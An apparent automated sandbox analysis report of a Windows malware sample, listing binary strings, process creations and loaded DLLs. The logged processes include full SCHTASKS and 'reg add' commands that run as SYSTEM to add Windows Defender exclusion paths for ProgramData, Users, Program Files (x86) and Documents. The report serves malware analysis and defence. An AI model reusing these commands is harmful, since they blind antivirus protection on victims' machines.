Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 149876985-734579485.05.exe

Virustotal: Detection: 6%

Source: YYAfLM.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: YYAfLM.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: YYAfLM.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: YYAfLM.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: YYAfLM.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: YYAfLM.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: 149876985-734579485.05.exe	String found in binary or memory: R(&M)I/O CRC errors(C7)Uncorrectable Sectors(C6)Reallocation sectors(C4)Temperature%dCTotal LBAs ReadTotal LBAs WrittenWrite Error RateCurrent Pending SectorsLoad/Unload Cycle CountUnsafe Shutdown CountG-sense Error RateCommand Timeout CountReported Uncorrectable ErrorsEnd-to-End errorProgram Fail CountSoft Read Error RatePower Cycle CountRecalibration RetriesSpin Retry CountPower-On HoursSeek Time PerformanceSeek Error RateReallocated Sectors CountStart/Stop CountSpin Up TimeThroughput PerformanceRead Error Rate(Threshold)Sto&p Mail checkE&xit&AboutSuppor&tSend &messenger&Send ClockPodHidden &Window ListWindow &ListThis Window &Info.&Battery check&CarendarRel&oad&R click key&M click key&L click key&Dodge pointer&Window Position&Font&GeneralC&ustomizecheckDisable glassEnable glassTransparentThroughSet &FontEna&ble&Top most&HideD&estroy&Disable 'Close'&CloseMove on DesktopMa&ximizeMi&nimize&Restore&Size&Movecheck\commandopen\shell.txtDwmEnableBlurBehindWindowLISTBOX%d:%c%sClockPod Ver2.73 (c)TORO 2024<DoDisconnect:%s/%s>Disconnect%s/%s
Source: 149876985-734579485.05.exe	String found in binary or memory: R(&M)I/O CRC errors(C7)Uncorrectable Sectors(C6)Reallocation sectors(C4)Temperature%dCTotal LBAs ReadTotal LBAs WrittenWrite Error RateCurrent Pending SectorsLoad/Unload Cycle CountUnsafe Shutdown CountG-sense Error RateCommand Timeout CountReported Uncorrectable ErrorsEnd-to-End errorProgram Fail CountSoft Read Error RatePower Cycle CountRecalibration RetriesSpin Retry CountPower-On HoursSeek Time PerformanceSeek Error RateReallocated Sectors CountStart/Stop CountSpin Up TimeThroughput PerformanceRead Error Rate(Threshold)Sto&p Mail checkE&xit&AboutSuppor&tSend &messenger&Send ClockPodHidden &Window ListWindow &ListThis Window &Info.&Battery check&CarendarRel&oad&R click key&M click key&L click key&Dodge pointer&Window Position&Font&GeneralC&ustomizecheckDisable glassEnable glassTransparentThroughSet &FontEna&ble&Top most&HideD&estroy&Disable 'Close'&CloseMove on DesktopMa&ximizeMi&nimize&Restore&Size&Movecheck\commandopen\shell.txtDwmEnableBlurBehindWindowLISTBOX%d:%c%sClockPod Ver2.73 (c)TORO 2024<DoDisconnect:%s/%s>Disconnect%s/%s

Source: C:\Users\user\Desktop\149876985-734579485.05.exe

File read: C:\Users\user\Desktop\149876985-734579485.05.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\149876985-734579485.05.exe "C:\Users\user\Desktop\149876985-734579485.05.exe"
Source: unknown	Process created: C:\Users\user\Documents\RgZ5EJ.exe C:\Users\user\Documents\RgZ5EJ.exe
Source: unknown	Process created: C:\Users\user\Documents\RgZ5EJ.exe C:\Users\user\Documents\RgZ5EJ.exe
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Program Files (x86)\YYAfLM\YYAfLM.exe "C:\Program Files (x86)\YYAfLM\YYAfLM.exe"
Source: unknown	Process created: C:\Program Files (x86)\YYAfLM\YYAfLM.exe "C:\Program Files (x86)\YYAfLM\YYAfLM.exe"
Source: unknown	Process created: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe "C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe"
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\YYAfLM\YYAfLM.exe "C:\Program Files (x86)\YYAfLM\YYAfLM.exe"
Source: unknown	Process created: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe "C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe"
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Program Files (x86)\YYAfLM\YYAfLM.exe "C:\Program Files (x86)\YYAfLM\YYAfLM.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini	Jump to behavior

Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: pid.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
